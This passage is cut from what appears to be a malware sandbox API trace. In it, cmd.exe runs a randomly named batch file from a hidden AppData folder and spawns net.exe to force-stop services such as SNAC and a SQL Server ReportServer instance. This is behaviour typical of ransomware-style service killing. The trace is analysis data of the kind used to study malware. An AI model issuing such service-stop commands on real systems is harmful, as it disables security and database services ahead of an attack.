dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0216.235] GetLastError () returned 0x2 [0216.236] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0216.236] GetLastError () returned 0x2 [0216.236] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0216.237] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f8278 [0216.237] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0216.237] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0216.237] GetLastError () returned 0x2 [0216.238] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f8278 [0216.238] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0216.238] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0216.238] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0216.238] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0216.238] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0216.239] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0216.239] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop SNAC /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop SNAC /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop SNAC /y", lpProcessInformation=0x3beae0*(hProcess=0x78, hThread=0x74, dwProcessId=0x684, dwThreadId=0x4b8)) returned 1 [0216.243] CloseHandle (hObject=0x74) returned 1 [0216.243] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0216.243] GetProcessHeap () returned 0x3e0000 [0216.243] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0216.243] GetEnvironmentStringsW () returned 0x3f8408* [0216.243] GetProcessHeap () returned 0x3e0000 [0216.243] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0216.243] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0216.243] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0216.375] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0216.375] CloseHandle (hObject=0x78) returned 1 [0216.375] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0216.375] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0216.375] GetProcessHeap () returned 0x3e0000 [0216.375] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0216.375] GetEnvironmentStringsW () returned 0x3f8408* [0216.376] GetProcessHeap () returned 0x3e0000 [0216.376] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0216.376] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0216.376] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0216.376] GetProcessHeap () returned 0x3e0000 [0216.376] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0216.376] GetEnvironmentStringsW () returned 0x3f8408* [0216.376] GetProcessHeap () returned 0x3e0000 [0216.376] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0216.377] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0216.377] GetProcessHeap () returned 0x3e0000 [0216.377] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0216.377] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0216.377] _get_osfhandle (_FileHandle=1) returned 0x264 [0216.377] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0216.377] _get_osfhandle (_FileHandle=1) returned 0x264 [0216.377] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0216.377] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0216.377] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0216.377] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0216.377] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0216.378] SetConsoleInputExeNameW () returned 0x1 [0216.378] GetConsoleOutputCP () returned 0x1b5 [0216.378] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0216.378] SetThreadUILanguage (LangId=0x0) returned 0x409 [0216.378] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0216.378] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0216.378] _get_osfhandle (_FileHandle=3) returned 0x78 [0216.378] SetFilePointer (in: hFile=0x78, lDistanceToMove=5760, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1680 [0216.378] GetProcessHeap () returned 0x3e0000 [0216.378] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0216.378] GetProcessHeap () returned 0x3e0000 [0216.378] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0216.378] GetProcessHeap () returned 0x3e0000 [0216.378] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0216.378] GetProcessHeap () returned 0x3e0000 [0216.378] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0216.378] GetProcessHeap () returned 0x3e0000 [0216.378] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3e1290 | out: hHeap=0x3e0000) returned 1 [0216.378] GetProcessHeap () returned 0x3e0000 [0216.378] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0216.378] GetProcessHeap () returned 0x3e0000 [0216.379] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0216.379] GetProcessHeap () returned 0x3e0000 [0216.379] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0216.379] GetProcessHeap () returned 0x3e0000 [0216.379] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0216.379] GetProcessHeap () returned 0x3e0000 [0216.379] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0216.379] GetProcessHeap () returned 0x3e0000 [0216.379] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3ef4b0 | out: hHeap=0x3e0000) returned 1 [0216.379] GetProcessHeap () returned 0x3e0000 [0216.379] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0216.379] GetProcessHeap () returned 0x3e0000 [0216.379] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0216.379] _get_osfhandle (_FileHandle=3) returned 0x78 [0216.379] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1680 [0216.379] ReadFile (in: hFile=0x78, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0x241, lpOverlapped=0x0) returned 1 [0216.379] SetFilePointer (in: hFile=0x78, lDistanceToMove=5795, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x16a3 [0216.379] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=35, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop ReportServer$SQL_2008 /y\r\n/y\r\n¥ /y\r\n\r\n¥ /y\r\nures\r\nnded\r\n") returned 35 [0216.380] _get_osfhandle (_FileHandle=3) returned 0x78 [0216.380] GetFileType (hFile=0x78) returned 0x1 [0216.380] _get_osfhandle (_FileHandle=3) returned 0x78 [0216.380] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x16a3 [0216.380] GetProcessHeap () returned 0x3e0000 [0216.380] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3ffad8 [0216.380] GetProcessHeap () returned 0x3e0000 [0216.380] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3ffad8 | out: hHeap=0x3e0000) returned 1 [0216.383] _tell (_FileHandle=3) returned 5795 [0216.383] _close (_FileHandle=3) returned 0 [0216.383] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0216.383] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0216.383] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0216.383] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0216.383] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0216.383] _wcsicmp (_String1="net", _String2="CD") returned 11 [0216.383] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0216.383] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0216.383] _wcsicmp (_String1="net", _String2="REN") returned -4 [0216.384] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0216.384] _wcsicmp (_String1="net", _String2="SET") returned -5 [0216.384] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0216.384] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0216.384] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0216.384] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0216.384] _wcsicmp (_String1="net", _String2="MD") returned 1 [0216.384] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0216.384] _wcsicmp (_String1="net", _String2="RD") returned -4 [0216.384] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0216.384] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0216.384] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0216.384] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0216.384] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0216.384] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0216.384] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0216.384] _wcsicmp (_String1="net", _String2="VER") returned -8 [0216.384] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0216.384] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0216.384] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0216.384] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0216.384] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0216.384] _wcsicmp (_String1="net", _String2="START") returned -5 [0216.384] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0216.384] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0216.384] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0216.384] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0216.384] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0216.384] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0216.384] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0216.384] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0216.384] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0216.384] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0216.385] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0216.385] SetErrorMode (uMode=0x0) returned 0x1 [0216.385] GetProcessHeap () returned 0x3e0000 [0216.385] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0216.385] GetProcessHeap () returned 0x3e0000 [0216.385] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0216.385] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0216.385] GetProcessHeap () returned 0x3e0000 [0216.385] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0216.385] GetProcessHeap () returned 0x3e0000 [0216.385] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0216.386] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6d58, Size=0x122) returned 0x3f6d58 [0216.386] GetProcessHeap () returned 0x3e0000 [0216.386] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6d58) returned 0x122 [0216.386] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0216.386] GetProcessHeap () returned 0x3e0000 [0216.386] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f81f8 [0216.386] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f81f8, Size=0x76) returned 0x3f81f8 [0216.386] GetProcessHeap () returned 0x3e0000 [0216.386] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f81f8) returned 0x76 [0216.387] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0216.387] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0216.387] GetLastError () returned 0x2 [0216.388] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0216.388] GetLastError () returned 0x2 [0216.388] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0216.389] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0216.389] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0216.389] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0216.389] GetLastError () returned 0x2 [0216.390] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0216.390] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0216.390] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0216.391] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0216.391] SetErrorMode (uMode=0x0) returned 0x1 [0216.391] GetProcessHeap () returned 0x3e0000 [0216.391] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0216.391] GetProcessHeap () returned 0x3e0000 [0216.391] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0216.391] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0216.392] GetProcessHeap () returned 0x3e0000 [0216.392] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0216.392] GetProcessHeap () returned 0x3e0000 [0216.392] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0216.392] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7018, Size=0x122) returned 0x3f7018 [0216.392] GetProcessHeap () returned 0x3e0000 [0216.392] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7018) returned 0x122 [0216.392] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0216.392] GetProcessHeap () returned 0x3e0000 [0216.392] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7148 [0216.392] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7148, Size=0x76) returned 0x3f7148 [0216.392] GetProcessHeap () returned 0x3e0000 [0216.393] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7148) returned 0x76 [0216.393] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0216.393] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0216.393] GetLastError () returned 0x2 [0216.394] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0216.394] GetLastError () returned 0x2 [0216.394] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0216.395] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0216.395] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0216.395] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0216.395] GetLastError () returned 0x2 [0216.396] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0216.396] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0216.396] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0216.396] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0216.396] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0216.397] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0216.397] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0216.397] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop ReportServer$SQL_2008 /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop ReportServer$SQL_2008 /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop ReportServer$SQL_2008 /y", lpProcessInformation=0x3beae0*(hProcess=0x74, hThread=0x78, dwProcessId=0x7bc, dwThreadId=0xb08)) returned 1 [0216.401] CloseHandle (hObject=0x78) returned 1 [0216.401] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0216.401] GetProcessHeap () returned 0x3e0000 [0216.401] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0216.401] GetEnvironmentStringsW () returned 0x3f8408* [0216.401] GetProcessHeap () returned 0x3e0000 [0216.401] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0216.401] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0216.402] WaitForSingleObject (hHandle=0x74, dwMilliseconds=0xffffffff) returned 0x0 [0216.537] GetExitCodeProcess (in: hProcess=0x74, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0216.537] CloseHandle (hObject=0x74) returned 1 [0216.537] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0216.537] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0216.537] GetProcessHeap () returned 0x3e0000 [0216.537] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0216.537] GetEnvironmentStringsW () returned 0x3f8408* [0216.537] GetProcessHeap () returned 0x3e0000 [0216.537] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0216.538] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0216.538] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0216.538] GetProcessHeap () returned 0x3e0000 [0216.538] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0216.538] GetEnvironmentStringsW () returned 0x3f8408* [0216.538] GetProcessHeap () returned 0x3e0000 [0216.538] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0216.538] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0216.538] GetProcessHeap () returned 0x3e0000 [0216.538] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0216.538] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0216.538] _get_osfhandle (_FileHandle=1) returned 0x264 [0216.538] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0216.538] _get_osfhandle (_FileHandle=1) returned 0x264 [0216.538] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0216.538] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0216.538] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0216.539] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0216.539] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0216.539] SetConsoleInputExeNameW () returned 0x1 [0216.539] GetConsoleOutputCP () returned 0x1b5 [0216.539] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0216.539] SetThreadUILanguage (LangId=0x0) returned 0x409 [0216.539] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, 